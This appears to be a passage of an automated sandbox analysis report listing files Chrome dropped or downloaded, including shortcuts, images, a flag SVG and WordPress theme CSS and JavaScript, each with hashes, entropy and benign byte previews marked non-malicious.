                                                                                                                                              SHA-512:3588336B4979C3427481601AD8E67A0920BCC0D99954D53FFAC1843364DCC35CCBF52CDF71E8989E02254245869C3308A81DC88EB2FA952E11FFC8C91B4CA883
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:L..................F.@.. ...$+.,.........]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 15:32:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2675
                                                                                                                                              Entropy (8bit):4.0138593943632745
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8HXdGTiCnWHGeidAKZdA1seh/iZUkAQkqeh6y+2:8HsTw9Q/y
                                                                                                                                              MD5:926191D3E6DD0CF9A40EC5651AAFEC8C
                                                                                                                                              SHA1:3260B35497A5F945AED671FA803E8CC649EE9AE2
                                                                                                                                              SHA-256:DA95127DB93185C1C75E27F05AFB89F72AC3BF96E58C2B1678D5500FB7E767F0
                                                                                                                                              SHA-512:3C3F965FE545B302221DCC528A61A8D0AF9562975DAD62ED4888CD016FE77C88311E04A40A6C00383588652A6F682E2AA646170788371B7E358C1FDAC14C1158
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:L..................F.@.. ...$+.,....o...]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2689
                                                                                                                                              Entropy (8bit):4.0204905699349895
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8DdGTiCAHGeidAKZdA14meh7sFiZUkmgqeh7s8y+BX:8oTCn2y
                                                                                                                                              MD5:309ED4E3B4C031CA25C37EE2FDB98127
                                                                                                                                              SHA1:371B7DF7BFA1210B7C378880FC48F7D9F179BF51
                                                                                                                                              SHA-256:12B66965CD33E057514DEC8E710B4F642ECDC5223D6A5CDD7388DB945724BC29
                                                                                                                                              SHA-512:E8D1B49DBAECB22A816BD70565FB24DFC500BD14AD71101AD299B454FD5284B47510C247A46A9C2F7529E50C1311DC091A4C72ACD0D8C0CBE6C05915589719A8
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 15:32:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2677
                                                                                                                                              Entropy (8bit):4.013636134562136
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8XTdGTiCnWHGeidAKZdA1TehDiZUkwqehOy+R:8oTr0y
                                                                                                                                              MD5:89F62869FFA7DF8585864949A2750957
                                                                                                                                              SHA1:D4BD58EAEEECE48FFBABC71C264BE24E0C55F2FC
                                                                                                                                              SHA-256:993FF23B07A633DC46C08CD761EEC7C88C399EDC22CA34A4A27C754167422B1B
                                                                                                                                              SHA-512:676A37F328854FADD1974DF95CEC09341A23B830FBF85353E7ACFB0A1551C631DEC44B62C5E30928D1D771D4A859CAF93E51171BCB03C4D79634345A66E95D1B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:L..................F.@.. ...$+.,....?....]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 15:32:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2677
                                                                                                                                              Entropy (8bit):4.001413925981469
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8LdGTiCnWHGeidAKZdA1dehBiZUk1W1qehYy+C:8wTL94y
                                                                                                                                              MD5:ADE55632C336BC35B6F5C1DADA86F265
                                                                                                                                              SHA1:1B43BF8B5F653AD17B1A753E45A3C2B9908A50A6
                                                                                                                                              SHA-256:18FCC84BB75968CBBE108E6E1BD45B89FFF86F4771C91CEE9A7CA5D009F8EFA3
                                                                                                                                              SHA-512:2AA79CD1470F56A34F28DCD8EAB7595ED7FA6741E0760208149D2683661EA245A4873E845DDC8E6DC0C9E44A7748E757738B6DF58C19F79403595A05EDC28D15
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:L..................F.@.. ...$+.,.....V...]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 15:32:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2679
                                                                                                                                              Entropy (8bit):4.010324611787371
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8KdGTiCnWHGeidAKZdA1duTeehOuTbbiZUk5OjqehOuTb2y+yT+:87TPTfTbxWOvTb2y7T
                                                                                                                                              MD5:53D5DA1133AE88F00E53524E3161D509
                                                                                                                                              SHA1:168D13904E519D471757FF25EFCE99025BEE5DD6
                                                                                                                                              SHA-256:22FB9E78EF649FB888CFEDCCC0E3774EF419E3D9E7C1F966904DD5F4F0BFF2B5
                                                                                                                                              SHA-512:332FC720D6E3E5EE7EFC6EE1FF8BE2E46A2FAE77B1C0B4D04E18B9C8620CC1DF929A1CB50A573AD27597B7E67C6CC175B3E8FFD26936375E332389E3AEBDFFE1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:L..................F.@.. ...$+.,.....C...]..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I#Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V#Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V#Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V#Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V#Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............].....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1222 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1169493
                                                                                                                                              Entropy (8bit):7.994471264780519
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:24576:HdO1c3spGncYV5WGtNETwvYIaoN+KuYbY/MoXhcZWyVkA7d:sc3rn/VcTLooQcEYaZDVk+
                                                                                                                                              MD5:6271955F458C0A20333167E528E476F3
                                                                                                                                              SHA1:B36725D616F004F0D73E442F9B857476DE9360B7
                                                                                                                                              SHA-256:25DE885311B8CC53EF87120CC5CBF8A575FF1DFA8893F022FC6041C023CFD4FB
                                                                                                                                              SHA-512:77F7D08366BA4AEEEC69785025C52ADA8A640EDB661B68CF997E3194938C526CE6F391E7BFB703DD935411D110D951777D8C67F018FE105577146F9143DACF14
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.PNG........IHDR.......v.............IDATx..K.v....]U.^.O.`.F.`.q8.FP@i.@..H.i!h./..~..%...D.... .B..;...9...U5....%m...y..c.Qu.u..d.A ...@p.......C.3....3.0@$.......b.....Z./.E..B.l...... "PU.m.w.~)~p...m.....wh......_-..%yM.: ..@.|..........'_....J.......3.g......tq....}.......{...@.......Z....o._..~..b..:.......u......6.}..5Z..D%o...}..u..`"X...g......o.g;......../U5.M^.B....g.5..K.9.>......?.......!.......5..;....l..m,U........4.....1..^q...|...6X...y`......S..?O...].x....:[.....{...hg_...f.*.l.....AU...`.........y......w......j....v..5<..ym.o...O......Y.....r...........M.eB.N_....Z.I.U......v.<....3*..Z.........?.p.....}+.kzB..y..}...2.........9k1.C.0..f......y.$..b._.l....i...`. ..~ ..|43....Ep.3.<..?..;.a~-U..7.{..k`..aP.....l3,.7:;...@d........#.1..S.~...7|.o,Yg.._...?..w.. ..;.pV........<....K..#v...aA!b...........C..3:.}..R.......Y=.....`........>..yo=.HbO...5!}}..\...j...L.g+.'....U.O<ST'.!...c.h...."......y...q..5..v..-...
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):221
                                                                                                                                              Entropy (8bit):4.954190859494583
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4Jdi/gRtXRDq5uRtuuHWeXYb5uRtdo7chg2:t43ccgf2uf3rkufqwP
                                                                                                                                              MD5:F685765A298DB5BA59FDDFA6DE08020E
                                                                                                                                              SHA1:26A13C58EB6166DC9688C4EF53290539FDC135AD
                                                                                                                                              SHA-256:54B194D90DE3E6F979A8AE032FEC2A246291724B5F14B8578C186D81B1FA65B4
                                                                                                                                              SHA-512:143BCB315D8AF83D8AFB0E834F77C4A84D4F2065887A9063CDF7F8F1FF143E0F30F8DAD2D56EC7E247EADB6DE8225E9F54BDA699F1C21C2CA507088BA5B3285B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://forms.pienissimo.com/nl.cfe72ae0b3d6d8485234.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-nl" viewBox="0 0 640 480">. <path fill="#21468b" d="M0 0h640v480H0z"/>. <path fill="#fff" d="M0 0h640v320H0z"/>. <path fill="#ae1c28" d="M0 0h640v160H0z"/>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):707
                                                                                                                                              Entropy (8bit):4.600987126421838
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:UiGEmtkxhNoMjPpZEAz4gVR4NRlMjPpZEAztK57aARHUCA:tpmshNoMl6m9V6NfMl6m457H+
                                                                                                                                              MD5:1877FC72C3A2A4E3F1299CCDB16D0513
                                                                                                                                              SHA1:3B13B3570948B77A60C65C72D561C47F67452E4A
                                                                                                                                              SHA-256:CB04C84B625847684F6B428B2ACC5772B549E12D18ACF8CA9B6A356CDB661FBC
                                                                                                                                              SHA-512:2AB944711CCF623425EE2EC5E36A01E5748BF6B636F9E02BED941FAB61237F0008BBDDFAD4A13E932F25B61AE98701546317F8A89697BCECDEA4CE47527F1947
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/css/custom.css?ver=4.5
                                                                                                                                              Preview:/* Have fun adding your style here :) - PS: At all times this file should contain a comment or a rule, otherwise opera might act buggy :( */../* General Custom CSS */...../*.Desktop Styles.================================================== */./* Note: Add new css to the media query below that you want to only effect the desktop view of your site */..@media only screen and (min-width: 768px) {. /* Add your Desktop Styles here */..}..../*.Mobile Styles.================================================== */./* Note: Add new css to the media query below that you want to only effect the Mobile and Tablet Portrait view */..@media only screen and (max-width: 767px) {. /* Add your Mobile Styles here */..}
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):6948
                                                                                                                                              Entropy (8bit):4.797723773346297
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:3RQ4fS5bzRyIy++mcS3n2s96/LEpeXHFykgxe:+lx3pSFh
                                                                                                                                              MD5:94DA2BC1C2DF74DAD8D2928E1F2ABB39
                                                                                                                                              SHA1:2B75295DDF1C98AA3BD47C9B5883399F265E4A45
                                                                                                                                              SHA-256:E62E8FE4252BF270D3984C4E3F4BE5FF5C19667DD195D5BBB9E404F3267F0981
                                                                                                                                              SHA-512:B070B317821592F03BE1B967ADC0103CB2310E98D44511FBF55CA61524FF5788E6C7ED68D5F6EA4BB1A93AC6FE8EDED113A6CA0453E6EEC0882FA9E47EFB6848
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/js/aviapopup/magnific-popup.css?ver=4.5
                                                                                                                                              Preview:/* Magnific Popup CSS */..mfp-bg {. top: 0;. left: 0;. width: 100%;. height: 100%;. z-index: 1042;. overflow: hidden;. position: fixed;. background: #000;. opacity: 0.8; }...mfp-wrap {. top: 0;. left: 0;. width: 100%;. height: 100%;. z-index: 1043;. position: fixed;. outline: none !important;. -webkit-backface-visibility: hidden; }...mfp-container {. text-align: center;. position: absolute;. width: 100%;. height: 100%;. left: 0;. top: 0;. padding: 0 8px;. box-sizing: border-box; }...mfp-container:before {. content: '';. display: inline-block;. height: 100%;. vertical-align: middle; }...mfp-align-top .mfp-container:before {. display: none; }...mfp-content {. position: relative;. display: inline-block;. vertical-align: middle;. margin: 0 auto;. text-align: left;. z-index: 1045; }...mfp-inline-holder .mfp-content,..mfp-ajax-holder .mfp-content {. width: 100%;. cursor: auto; }...mfp-ajax-cur {. cursor: progress; }...mfp-zoom-out-cur, .mfp-zoom-out-cur
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):908
                                                                                                                                              Entropy (8bit):4.489980594331261
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2GuBkYApJDxUKBP2e2nTC4T2PL2kVr086L0MJu/b:GBnApJDxUcOegC1PCkVr08nl
                                                                                                                                              MD5:A5561B9480514546A73A09828A5C12EE
                                                                                                                                              SHA1:6DCD9D99F1EA1D794496B67E755EB40B918F9447
                                                                                                                                              SHA-256:4B4F3412D4FFA62F21545FA5CA2EFF90C4AC0B678B8A9D77786DF3EEC998D419
                                                                                                                                              SHA-512:7AD7384A4E819ABC94DC14136B3A4C969592E9BCF1418646D2129C6CA4B4E25231C8BD03CA5109B633E5C0330195AD618970453D17ECD2E23DBE97479EF7ED20
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// Progress bar shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_progressbar = function(options)..{...return this.each(function()...{....var container = $(this), elements = container.find('.avia-progress-bar');............//trigger displaying of progress bar....container.on('avia_start_animation', function()....{.....elements.each(function(i).....{......var element = $(this)............setTimeout(function()......{ .......element.find('.progress').addClass('avia_start_animation') .......element.find('.progressbar-percent').avia_sc_animated_number(.......{........instant_start:true, simple_up:true, start_timer: 10.......});.............}, (i * 250));.....});....});...});..}...}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 75 x 74, 8-bit/color RGB, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):27289
                                                                                                                                              Entropy (8bit):5.290183523103714
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:/JN9NvO3tS5vXqZTkNCM9r4TNgSJmlq9nScaXnuF4P:BN9Nv4t+XqZGwNgSJ4qlSzuF4P
                                                                                                                                              MD5:AD62A910EE89CB38055B4E8357284004
                                                                                                                                              SHA1:227041543BEC7A5208B0761A17DE888BD595B794
                                                                                                                                              SHA-256:68085A4480B125AB77222E871A3A3DE546F6BEF60C6E6AD638355BB23BE1DCD1
                                                                                                                                              SHA-512:B3D2AF1A4061A5F1139D1941F20B8C2DA39EF2C1CA08A4700AF651756DA9E4A355F2640ADE90126B963DDF4ECF4585BAC3B7DE9D00EA23799A8435AA21B3FFCB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2019/06/1.png
                                                                                                                                              Preview:.PNG........IHDR...K...J.....|p>.....pHYs.................iCCPPhotoshop ICC profile..x..wT.Y.......-!.RBo....k...FH ...B.......X...eDFD... cA,X..{..AE]..6T....{v..=g.s.9..{........Nr.R1...-..b...I.)l.. .......\.ott8...p.....6\.T..[...sy.H4...sy...1...'....$.0^*......`..S..-...Lr=.0.&............D.re...].`...r..'....E.....x.\>.M........h..`..O>...LSzr..%O......Q.T.].....+..0...P....$..&kI..%i.QS,.O......!.S...O.b>7 l..Y.S.M...9qS,[.....#....%....Nq.(.3....)..%DNqnVl......S.({..)g.....K...Q.....G...#..)}......J=7/VyV..S....i.h.."..<y.29.....r.H ..}.Rq:.#...b;...$%..'......@XW...N....D0.q..N<.`|.........)dy.......P.&h.>.....8...@ .B..A2,...!.d...`..C)l..P......!8.mp...E..}p......K...0. ...#.D.1@L.k..qE..@$..A..TD.H..R..CJ.2...4"."'...e....."#.[....4...f.l...E..8t!*@s.|...V.u.A..=.^Eo...Kt.....0C..s...(,...d.*.....f....n`..+.3..c..8.........rp.p.qU...V.y... n...O.....x.>././...+..............E0'..B..L...F..B....O."...Dm.5..E....b.N.A...u.0...J2 9..H)$.i-..t.t.t
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3911
                                                                                                                                              Entropy (8bit):4.880360157532382
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:gGJfIYJqr33fK8A5Gjg+QHW7CYid8u5BESgauLn:/tJI3C8AGg+l7CngdLn
                                                                                                                                              MD5:9F613B24E0177C946218F10B8487B550
                                                                                                                                              SHA1:84115E31E7155577FE25877B4D27268F7EDBCDC2
                                                                                                                                              SHA-256:8F7D1699F11BAD91F63C84ACCD7CCD4F4EFBC698B061BEEA0EB5E3C9879BF59A
                                                                                                                                              SHA-512:A70B60C24A85FFF3DF608C952D3EFFD8F635DB088A693618F444E83374F37958BC825DD56AF8F8BA2B2317F068DADE356FF09D621FC7357F3D8F1C0350960BDD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/postslider/postslider.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Post Slider.====================================================================================================================================================== */..avia-content-slider{ margin:30px 0; clear:both; }..avia-content-slider, .avia-content-slider-inner{ position: relative; overflow: hidden; clear:both; }..avia-content-slider .slide-entry-title{font-size:1.1em; line-height:1.4em; margin:0;}..avia-content-slider .slide-image, .avia-content-slider .slide-image img{border-radius: 3px; display: block; position: relative; -webkit-perspective: 1000px;.-webkit-backface-visibility: hidden; margin:0 auto;}..avia-content-slider .slide-image{overflow:hidden; margin-bottom:6px; border-radius: 3px;}..avia-content-slider .slide-entry-excerpt{ overflow: hidden; text-overflow: ellipsis; } ..avia-content-slider .slide-entry-wrap{width:100%
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=9, manufacturer=FUJIFILM, model=X-S10, xresolution=138, yresolution=146, resolutionunit=2, software=Adobe Photoshop Lightroom Classic 13.4 (Windows), datetime=2024:07:26 14:18:03], baseline, precision 8, 1500x630, components 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1019783
                                                                                                                                              Entropy (8bit):7.9803975392161215
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:LXOcBLmxXHIKQLbJ4gO0q4DNHWfnBikVdj4:LTAHmq+q4hH+YkVC
                                                                                                                                              MD5:028411E9FD93E1611117FCC8D54A7748
                                                                                                                                              SHA1:773EE4E28A7750E05CE2A15AEA927F734493B8D7
                                                                                                                                              SHA-256:A4EA5F523316D455B2703B8C18519C84842DED59C7EC962E14101B6C550AA23A
                                                                                                                                              SHA-512:D1A41BA1EB6F438836963FA821AF9C71604F4E1BBCF55EFB34F2DC2747B38BC29182E0FDB01F73DCC18272408B66DE8699A9FC720F8720EE0C373A0B0518F1D1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......JFIF............).Exif..II*...............z.......................................(...........1...1.......2...........;...........i...............FUJIFILM..X-S10.................Adobe Photoshop Lightroom Classic 13.4 (Windows)..2024:07:26 14:18:03.YOUGENIO..'........................."...........'...........0...................0232............................................................................................$...........,...........4...............................................<.......................D...........L.............................................................................................../.......................................1.......T...2.......^...3.......~...4...........5...................2...........2024:07:17 18:14:00.2024:07:17 18:14:00.+02:00..+01:00..+01:00..P.V.@B..............d.......d...,...d...N...d...d.......d.......1D000530......d...|...d.......d.......d...FUJIFILM..XF18-55mmF2.8-4 R LM OIS..1CC10160................................
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):482
                                                                                                                                              Entropy (8bit):4.626408410219915
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:t41WffFcfbpmO7+iCC4Mfiz9DI9T5VN5Tlp9jyuyuH+/:t414fFmpmOaiCC4MfWRsN19jyHYk
                                                                                                                                              MD5:212E30E47232BE03033A87DC58EDAA95
                                                                                                                                              SHA1:4D69C4A3DC57503E08B76C774135BFE83E8B1F51
                                                                                                                                              SHA-256:1F026BEB67630ABCDBC341651B1C17591AA76261296A9FB118793765964EB4E9
                                                                                                                                              SHA-512:13F153263DBF35F91793E8F3FE7249CE87C4854620C2D97F79646C70BBB2F71C5C3759496FFD101FBC6EF9657B19595FE782200649A96473BECD1AD7DAE1F72E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
